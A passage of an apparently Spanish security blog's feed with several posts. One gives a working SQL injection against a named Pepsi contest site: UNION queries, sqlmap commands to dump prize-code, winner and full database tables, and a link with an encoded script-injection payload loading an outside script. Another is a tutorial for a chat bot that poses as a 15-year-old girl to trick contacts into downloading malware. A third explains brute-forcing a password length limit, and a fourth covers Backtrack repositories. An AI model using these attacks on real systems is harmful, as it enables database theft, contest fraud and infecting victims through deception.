/&gt;&lt;br /&gt;Al ver que la variable no cogia debido a que ya era un error PRINT decido dorkear en busca de variables.&lt;br /&gt;&lt;br /&gt;Un compañero [Qosmio] me dio un PoC pero no me funko debido a que el servidor donde alojo el GIE estaba algo lento.&lt;br /&gt;asi que decido hacer un Flash Manual para lograr ver de forma superficial...&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;b&gt;http://www.pepsichangethegame.com/userimage.php?id=-642%20union%20all%20select%201,Replace%28Group_concat%28Cast%28Table_Name%20AS%20CHAR%29%29,0x2c,0x3c62723e%29%20from%20information_schema.tables--&lt;/b&gt;&lt;/blockquote&gt;&lt;br /&gt;al notar sus &lt;b&gt;TABLAS:&lt;/b&gt; pepsi_wc_usermaster y pepsigame ; supuse que tendrian info DIRECTA de los usuarios.. si era cierto, completamente cierto!! pero bueno se preguntaran, que tiene una db mas?&lt;br /&gt;&lt;br /&gt;De hay salio mi duda, es PEPSI NO? debe promocionar o tener algun concuros con sus bebidas!!&lt;br /&gt;Claro esa era la respuesta, pepsi tenia un concurso de CODES debajo de las tapas los cuales al ser ingresados te daban un premio si acertabas con el GANADOR!&lt;br /&gt;&lt;br /&gt;Decidi loguearme con un user normal y buscar que encontraba....&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Encontre esto:&lt;/b&gt; &lt;a href="http://www.pepsichangethegame.com/winner.php"&gt;http://www.pepsichangethegame.com/winner.php&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;Que al parecer es una lista con los "GANADORES" de el concuro; [Cuando vi IPOD WINNER's Me dieron ganas de que lo hicieran en mi pais con la misma web jajaja]&lt;br /&gt;&lt;br /&gt;Al ver los supuestos codes que se SUPRIMIAN en algunos caracteres afirme! que tenia que haber un lugar que verificara estos codigos para certificar si era Ganadores o perdedores de dicho premio.&lt;br /&gt;&lt;br /&gt;La respuesta estaba en las dbs claro!!&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;b&gt;http://www.pepsichangethegame.com/userimage.php?id=-642%20union%20all%20select%201,Replace%28Group_concat%28Cast%28Table_Name%20AS%20CHAR%29%29,0x2c,0x3c62723e%29%20from%20information_schema.tables--&lt;/b&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;TABLAS:&lt;/b&gt;&lt;br /&gt;wap_codes &lt;---- CONTIENE CODIGOS NO SE DE QUE JA!web_codes &lt;---- CONTIENE CODIGOS DE LA WEB [Supongo que son para el concurso]winners &lt;----- [GANADORES del concurso]&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-XkDhjLnPjYo/TnqVhms43cI/AAAAAAAAADw/PqemohGzEI8/s1600/codes.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="256" width="320" src="http://3.bp.blogspot.com/-XkDhjLnPjYo/TnqVhms43cI/AAAAAAAAADw/PqemohGzEI8/s320/codes.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno ya hice mis ideas con esas tablas y su contenido ahora, a que viene todo? se saca un CODE se ingresa y te ganas un IPOD WUALA!! XD! [No esta Probado debido a que esta promocion no es dirigida para mi pais]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;[Escrito TEORICO, no ha sido comprobado]&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Quieres Manipular las DB y TABLAS DE PEPSI CHANGE THEGAME?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Entrada para Newbies &amp; Dummies:&lt;/b&gt;  &lt;a href="http://www.pepsichangethegame.com/userimage.php?id=-1+union+select+null,((0x3c736372697074207372633d27687474703a2f2f307874686f722e637a2e63632f302e6a73272f3e))--"&gt;GIE DB "PAN COMIDO"&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;[La tool para explorar dbs no es NEWBIE, el mensaje solo es para los usuarios Espectadores que quieran ver superficialmente y no quieren hacer las consultas directas]&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TABLA:&lt;/b&gt; &lt;a href="http://www.multiupload.com/A3ZL1H5VZ6"&gt;pepsi_wc_usermaster&lt;/a&gt;&lt;br /&gt;&lt;b&gt;TABLA:&lt;/b&gt; &lt;a href="http://www.multiupload.com/E7FSGICVPI"&gt;pepsigame&lt;/a&gt;&lt;br /&gt;&lt;b&gt;TABLA:&lt;/b&gt; wap_codes: ./sqlmap.py -u http://www.pepsichangethegame.com/userimage.php?id=456 --dump -T wap_codes -D pepsictg&lt;br /&gt;&lt;b&gt;TABLA:&lt;/b&gt; web_codes:: ./sqlmap.py -u http://www.pepsichangethegame.com/userimage.php?id=456 --dump -T web_codes -D pepsictg&lt;br /&gt;&lt;b&gt;&lt;br /&gt;[Resto de las Tablas Suprimidas por que no se le ve importancia a la info contenida]&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Nota: &lt;/b&gt; si deseas descargar/dumpear las tablas sobrantes puedes seguir el PoC: http://www.pepsichangethegame.com/userimage.php?id=-642%20union%20all%20select%201,Replace%28Group_concat%28Cast%28Table_Name%20AS%20CHAR%29%29,0x2c,0x3c62723e%29%20from%20information_schema.tables--&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descargar BD COMPLETA?&lt;/b&gt; Via &lt;i&gt;SQLMAP&lt;/i&gt;: ./sqlmap.py -u http://www.pepsichangethegame.com/userimage.php?id=456 --dump-all -D pepsictg&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-4745663176169947149?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/4745663176169947149/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/09/exposed-pepsi-change-game.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4745663176169947149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4745663176169947149'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/09/exposed-pepsi-change-game.html' title='EXPOSED!! PEPSI &quot;Change The game&quot;'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_EtSbZlb0Cgs/SKWO5_fp6II/AAAAAAAAAPA/T2hyUiyyc1I/s72-c/pepsi8vb.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-8163169729125066501</id><published>2011-07-15T10:45:00.001-07:00</published><updated>2012-02-24T11:55:40.786-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bug Report'/><title type='text'>Bug de caracteres y limite en "windows live msn" via IPHONE</title><content type='html'>Resulta que hace unos dias de estrenar mi iphone nuevo decído instalarle las aplicaciones sociales despues de su respectivo jailbreaka mi iphone, todo muy bien!!&lt;br /&gt;&lt;br /&gt;probando skype, twitter, hasta mi cuenta de dropbox share y al final recorde que me faltaban 2 clientes muy esenciales!! el cliente irc y el cliente msn.&lt;br /&gt;&lt;br /&gt;al instalar la app oficial de msn por "microsoft corporation" via: App Store, una vez terminado mi hermana me pide prestado msn y se lo dejo unos 30 min y todo bien!!&lt;br /&gt;&lt;br /&gt;al yo hacer mi loggeo me salta lo siguiente!!:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IMAGEN EN SERVIDOR OFFLINE&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;pues normal... pense que se habia escrito mal... intente otra vez y de nuevo!!&lt;br /&gt;multiples veces intentando y nada....pues me asuste y pense &lt;b&gt;PWNED&lt;/b&gt; me dirijo rapidamente a SAFARI e intento con HOTMAIL y nada :S luego con OPERA y nada!! pues enseguida voy a la pc y todo bien, quede algo desconcertado... al ver el numero de caracteres intente formular otra passwd con el mismo numero de esta y cambiarla para testear y efectivamente no funkaba, para estar mas seguro ingrese con otra cuenta y una passd de 6 caracteres y todo iba bien!! luego decido cambiar esta clave de 6 por una de igual caracteres a la que no me dejaba ingresar, y al intentar el logueo... ERROR!! asi que la solucion para poderle ingresar fue usar una contraseña no muy robusta y asi se me permitiese el logueo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IMAGEN EN SERVIDOR OFFLINE&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En pocas palabras mi solucion fue usar una contraseña de carcateres habituales entre los 5 o 10 ya que si esta se pasa no permitiria el acceso desde dispositivos IPHONE.&lt;br /&gt;&lt;br /&gt;Esto fue testeado en 2 dispositivos IPHONE 3G /*MB si pueden probar en MC u otras versiones no estaria mal.&lt;br /&gt;Espero se animen a testear y ver si en otros dispositivos les sucede de esta marca APPLE.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Donde esta realmente el Bug?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Simple debido a que la intencion de este articulo no es AFIRMAR DE FORMA DIRECTA que es un BUG establecido y definido por errores de la empresa. si no una limitacion que obliga al usuario a no tener passwd con seguridad fuerte y mientras el atacante sepa realmente de donde viene dicha conexion puede facilmente realizar un ataque de fuerza bruta acertando el numero de caracteres de la passwd.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;EJEMPLO&lt;/b&gt;: se tenia una clave del tipo: asf896agbjkq109nql)%b1lk182336&lt;br /&gt;&lt;b&gt;DEBIDO AL LIMITE:&lt;/b&gt; se somete al user usar una clave de tipo: 4j50ñ3f23&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ahora viene... Que es mas facil romper?&lt;/b&gt;&lt;br /&gt;tu passwd anterior de caracteres INDEFINIDOS:  asf896agbjkq109nql)%b1lk182336&lt;br /&gt;o tu passwd nueva sometida a un numero definido de caracteres que todos tienen conocimiento de el:  4j50ñ3f23&lt;br /&gt;&lt;br /&gt;El Atacante solo con saber el tipo de via de la conexion podria realizar o poner en marcha un ataque de tipo &lt;b&gt;DEFINIDO.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ATACANTE:&lt;/b&gt; mediante tecnicas de fingerprint se define que el &lt;i&gt;USUARIOX&lt;/i&gt; se conecta via&lt;i&gt; IPHONE&lt;/i&gt; desde el cliente &lt;i&gt;Wlmsn de Microsoft&lt;/i&gt; y define que el usuario habitual de este medio deberia tener una PASSWD entre 5 y 10 caracteres.&lt;br /&gt;&lt;br /&gt;Se programa un ataque por fuerza bruta o diccionarios definiendo que los caracteres a ingresar sean entre 5 y 10 para poder romper la entrada.&lt;br /&gt;&lt;br /&gt;Aunque podria llevar algo de tiempo dependiendo del tipo o grandeza de la contraseña, se podria afirmar que el resultado final seria ESTABLECIDO debido al conocimiento real de los caracteres limites.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-8163169729125066501?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/8163169729125066501/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/07/bug-de-caracteres-y-limite-en-windows.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/8163169729125066501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/8163169729125066501'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/07/bug-de-caracteres-y-limite-en-windows.html' title='Bug de caracteres y limite en &quot;windows live msn&quot; via IPHONE'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-5979049920119888957</id><published>2011-06-30T19:05:00.000-07:00</published><updated>2011-06-30T19:10:39.890-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><title type='text'>Instalando Menus y artilleria de Backtrack 5 en una distro terciaria</title><content type='html'>Bueno siendo amante de&lt;b&gt; LINUX&lt;/b&gt; quiero decir que me gustan las distro personalizadas y estructuradas por mi, con la llegada de BT5 decidi instalarmelo como S.O principal y la verdad no me agrada.. se pude decir que es una exclente distro de seguridad pero a manera de &lt;b&gt;LIVE CD&lt;/b&gt; por que en realidad como un S.O principal no me agrada mucho, algo tedioso segun mi parecer.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA:&lt;/b&gt; la pagina oficial de backtrack 5 afirma que no es recomendable instalar y/o agregar repositorios en distribuciones terciarias a esta, ya que puede presentar paquetes rotos y dependencias que no se pueden satisfacer, en cambio si te consideras un usuario de nivel intermedio o avanzado y puedes desenvolverte bien en linux, podras enfrentarte a este tipo de problemas que podrian ser futuros.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA2:&lt;/b&gt; si sabes hacer las cosas y dominar linux creeme que no tendras ningun tipo de problemas ya que podras darle solucion alguna si llegara a pasar.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Comenzemos&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Primero que nada necesitamos lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.multiupload.com/KL4YWCJ59M"&gt;Archivos necesarios&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Bueno abrimos una terminal y tecleamos:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;gksudo nautilus&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Una vez nos vamos al directorio &lt;b&gt;/etc/xdg/&lt;/b&gt; donde veremos una carpeta nombrada &lt;b&gt;"menus"&lt;/b&gt; ahora cogemos la carpeta menus que descargamos al inicio del articulo pegandola en el directorio &lt;b&gt;/etc/xdg&lt;/b&gt; para sustituir la que ya estaba estructurada, RECOMIENDO HACER BACKUP.&lt;br /&gt;&lt;br /&gt;una ves hecho esto abrimos una terminal y tecleamos:&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;br /&gt;sudo gedit /etc/apt/sources.list&lt;br /&gt;&lt;/pre&gt;Agregamos los repositorios de BT5:&lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;br /&gt;###########BACKTRACK 5###################################&lt;br /&gt;deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing&lt;br /&gt;deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing&lt;br /&gt;deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;le podimos la Llave al servidor &lt;br /&gt;&lt;pre class="brush :html"&gt;&lt;br /&gt;wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;y finalizamos con un &lt;pre class="brush :html"&gt;sudo apt-get update&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vista Previa con algunas herramientas instaladas que activaron ciertos menus categoricos:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-1uKYQlxgKPU/Tg0ryJwRO_I/AAAAAAAAADY/hB9ueGVB3yo/s1600/screenshoov2jo.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="160" width="200" src="http://1.bp.blogspot.com/-1uKYQlxgKPU/Tg0ryJwRO_I/AAAAAAAAADY/hB9ueGVB3yo/s200/screenshoov2jo.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;No se ve tan cargado como el original de bT5 por que no he instalado todas las tools que este trae, solo instale algunas para mostrar la previa en este presente articulo.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para poner los menus en nuestro idioma natal solo basta con editar el archivo applications.menu&lt;br /&gt;que se encuentra en la ruta: &lt;b&gt;/etc/xdg/menus/&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Previa de cambio de Idioma:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-SI5wNeuFEAE/Tg0rDgfNmKI/AAAAAAAAADI/w3B8RYW2Xj4/s1600/Screenshot.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="160" width="200" src="http://3.bp.blogspot.com/-SI5wNeuFEAE/Tg0rDgfNmKI/AAAAAAAAADI/w3B8RYW2Xj4/s200/Screenshot.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Previa del funcionamiento de una tool [0trace] seleccionada:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Z-xZFGLmJqY/Tg0rb-0dVVI/AAAAAAAAADQ/Jla42DgkZKs/s1600/Screenshot.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="160" width="200" src="http://4.bp.blogspot.com/-Z-xZFGLmJqY/Tg0rb-0dVVI/AAAAAAAAADQ/Jla42DgkZKs/s200/Screenshot.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA:&lt;/b&gt; los menus no seran visibles hasta que instales herramientas de BT5, cabe aclarar que cada vez que instales una herramienta el menu te las organiza automaticamente por categorias como el usual Backtrack5&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-5979049920119888957?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/5979049920119888957/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/06/instalando-menus-y-artilleria-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/5979049920119888957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/5979049920119888957'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/06/instalando-menus-y-artilleria-de.html' title='Instalando Menus y artilleria de Backtrack 5 en una distro terciaria'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-1uKYQlxgKPU/Tg0ryJwRO_I/AAAAAAAAADY/hB9ueGVB3yo/s72-c/screenshoov2jo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3052359273949872119</id><published>2011-06-11T21:40:00.000-07:00</published><updated>2011-06-20T13:16:57.476-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ing-Social'/><category scheme='http://www.blogger.com/atom/ns#' term='Malwares'/><title type='text'>Creando un [BOT MSN] Con fines de esparcir un Malware</title><content type='html'>Bueno me inspire a crear este articulo.. ya que hace unos dias charlando con un compañero, me abrio una ventana un TIPO que Hablaba Ingles..&lt;br /&gt;&lt;br /&gt;&lt;font color="orange"&gt;Duker:&lt;/font&gt; hello Man!!&lt;br /&gt;&lt;font color="yellow"&gt;MaztoR:&lt;/font&gt; Hola quien eres¿?&lt;br /&gt;&lt;font color="orange"&gt;Duker:&lt;/font&gt; How are You!¿?&lt;br /&gt;&lt;font color="yellow"&gt;MaztoR:&lt;/font&gt; quien eres? de donde me agregas=? y que quieres¿?&lt;br /&gt;&lt;font color="orange"&gt;Duker:&lt;/font&gt; My Picture is http://xxxxx.com/index.php&lt;br /&gt;&lt;br /&gt;En pocas palabras dige! es un BOT pero no de LIVE MSN OFICIAL ya que queria simularme una Conversacion! y mientras charlabamos Decirme que si queria Ver su FOTO , IMAGEN o WEB?  &lt;br /&gt;&lt;br /&gt;"Logicamente al ver q se mantiene una Conversacion directa dirias¿?, es un humano y no un Spread! asi que vere su Pagina"&lt;br /&gt;&lt;br /&gt;De repente Quedas Infectado con un Redirect de un INDEX.PHP hacia un EXE o Malware para Camuflar.&lt;br /&gt;&lt;br /&gt;Ya les Conte como funciona y de que manera.. en este caso fucionaremos &lt;br /&gt;&lt;br /&gt;ING SOCIAL + AUTOMATIZADO + COHERENCIA&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bueno a estructurar el Malware&lt;/b&gt;&lt;br /&gt;Procederemos a crearnos una Cuenta en la Siguiente web y a descargar nuestra IBOX PLATAFORM&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;http://sp.incesoft.com&lt;/blockquote&gt;&lt;b&gt;Nota:&lt;/b&gt; es una Plataforma para Bots [SOFTWARE] que nos permitira la configuracion total del IBOT&lt;br /&gt;&lt;br /&gt;Un formulario comun y corriente&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.imagengratis.org/images/2011061123044.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="372" width="611" src="http://www.imagengratis.org/images/2011061123044.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Una ves teniendo una cuenta nos decidimos a la Configuracion externa de nuestro BOT como lo es.. MENSAJE - AVATAR - NICK y todo... Esto lo haremos con el fin de simular un user comun y corriente.&lt;br /&gt;No Daremos Pistas de que es un BOT&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-10bf-JPmsic/TfQ8snzFj5I/AAAAAAAAACo/AlH45Vxj3ko/s1600/2011-06-11_23-12-11.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="206" width="320" src="http://2.bp.blogspot.com/-10bf-JPmsic/TfQ8snzFj5I/AAAAAAAAACo/AlH45Vxj3ko/s320/2011-06-11_23-12-11.png" /&gt;&lt;/a&gt;&lt;/div&gt;Para ello en la Imagen me decidi a simular una Chica Aproximadamente de 15 Años que solo busca Amigos..&lt;br /&gt;Se llama Laura su pic es de una chica llamativa y cosas asi...&lt;br /&gt;&lt;br /&gt;Actualizamos la Informacion y Guardamos&lt;br /&gt;&lt;br /&gt;Basic Info: Informacion simple del BOT.. servidor CHINA mensajes y todo pero solo es en tu cuenta! no se vera en el BOT MSN CONTACT&lt;br /&gt;&lt;br /&gt;Robot Account: Ahi es donde agregan sus cuentas de MSN para que vivan los bots, y las administran , pueden cambiar sus contraseñas, ver que usuarios lo agregaron, etc.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.imagengratis.org/images/2011061123201.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="120" width="465" src="http://www.imagengratis.org/images/2011061123201.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Display Pictures: Cambian las imagenes que puede tener el bot&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-UqM-TP5gsRA/TfQ_OTDOZHI/AAAAAAAAACw/AkANToTG1uQ/s1600/2011-06-11_23-23-01.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="149" width="320" src="http://2.bp.blogspot.com/-UqM-TP5gsRA/TfQ_OTDOZHI/AAAAAAAAACw/AkANToTG1uQ/s320/2011-06-11_23-23-01.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;My Emotions: Agrega emoticones personalizados&lt;br /&gt;&lt;br /&gt;Your Files: podremos subir archivos que se le enviarian a los contactos&lt;br /&gt;Nuestro caso, algun malware.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-zO_I20t7BfE/TfQ_qKsS7NI/AAAAAAAAAC4/wiScyShqo-M/s1600/2011-06-11_23-24-41.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="75" width="320" src="http://1.bp.blogspot.com/-zO_I20t7BfE/TfQ_qKsS7NI/AAAAAAAAAC4/wiScyShqo-M/s320/2011-06-11_23-24-41.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;La cuenta Hotmail que Agregaran en Msn Account management debe ser REAL y que quede acorde a los datos para pasar desapersividos&lt;br /&gt;si tu Nick es LAURA create un MSN masomenos asi&lt;br /&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;lau-67548-linda@hotmail.com&lt;/pre&gt;&lt;/div&gt;Eso es creible pero no haras incoherencias como:&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;elmejor-man@hotmail.com&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;Sopechoso no ¿?&lt;br /&gt;Despues de este paso decidiremos hacer CONECTAR y DARLE VIDA A FRANKESTEIN XD!.. pero Primero configuraremos que Dira... que Preguntara y como Actuara!..&lt;br /&gt;&lt;br /&gt;Ya despues de terminar la configuracion procedemos a descargar los Sources JAVA SDK, COM SDK&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-WdyaPVHlR64/TfRAIXWuXSI/AAAAAAAAADA/zvK-P2hDQMw/s1600/2011-06-11_23-26-29.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="88" width="216" src="http://2.bp.blogspot.com/-WdyaPVHlR64/TfRAIXWuXSI/AAAAAAAAADA/zvK-P2hDQMw/s320/2011-06-11_23-26-29.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Configurando el interior&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Una ves descargado todo tendremos que tener conocimientos en el lenguaje BASE: JAVA, como no quiero alargar este articulo no muestro esas partes.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Debemos tener en cuenta la conversacion: debe ser Coherente, debe tener preguntas y respuestas previas:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;EJEMPLO&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;BoT: Hola!&lt;br /&gt;user: hola&lt;br /&gt;bot: como estas?&lt;br /&gt;user: bien y tu?&lt;br /&gt;bot: bien, quieres ver mi foto?&lt;br /&gt;user: si&lt;br /&gt;bot: mira: [Link malicioso]&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Pues Bueno... Ahora Como Infectaremos con Algun malware ¿?&lt;/b&gt;&lt;br /&gt;Procedemos a Subir un .EXE ya sea un Server de BOTNET o Troyano o un SHD o un SERVER PROXY o FTPSERVER lo que quieran... a algun Hosting personal o nuevo y lo metemos en medio de la conversacion del IBOT&lt;br /&gt;En mi caso hice mi BOT de esta Manera...&lt;br /&gt;&lt;br /&gt;&lt;font color="brown"&gt;BOT:&lt;/font&gt; Hola&lt;br /&gt;&lt;font color="blue"&gt;User:&lt;/font&gt; Hola&lt;br /&gt;&lt;font color="brown"&gt;BOT: &lt;/font&gt;como estas¿?&lt;br /&gt;&lt;font color="blue"&gt;User:&lt;/font&gt; bn y tu , quien eres?&lt;br /&gt;&lt;font color="brown"&gt;BOT:&lt;/font&gt; yo estoy bien.. soy Laura tengo 15 Años y busco amigos&lt;br /&gt;&lt;font color="blue"&gt;User&lt;/font&gt;: mm ya&lt;br /&gt;&lt;font color="brown"&gt;BOT:&lt;/font&gt; tengo fotos y una Pagina :)&lt;br /&gt;&lt;font color="brown"&gt;BO&lt;/font&gt;T: mi pagina es http://www.webconmalware.com/index.php&lt;br /&gt;&lt;font color="blue"&gt;User:&lt;/font&gt; Me pide que baje un Archivo¿?&lt;br /&gt;&lt;font color="brown"&gt;BOT:&lt;/font&gt; ahh se me olvidaba para verla bien debes bajar el Complemento de videos&lt;br /&gt;&lt;font color="blue"&gt;User:&lt;/font&gt; ahh OKz! &lt;br /&gt;&lt;br /&gt;El Index.php de mi web tiene un REDIRECT hacia un .exe y q se autodescargue y que imprima una alerta que diga.. "Necesita Bajar el Sgte Complemento"&lt;br /&gt;La persona lo baja y listo!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Como difundir Nuestro Correo BOT¿?&lt;/b&gt;&lt;br /&gt;muy simple, exportando listas de contactos y agregandolas al msn bot, usando mailist entre muchas mas.&lt;br /&gt;&lt;br /&gt;Analizando todo, ya ven como convertir una simple APP en una potente herramienta de Marketing o malwaring? incluso crimeware.&lt;div 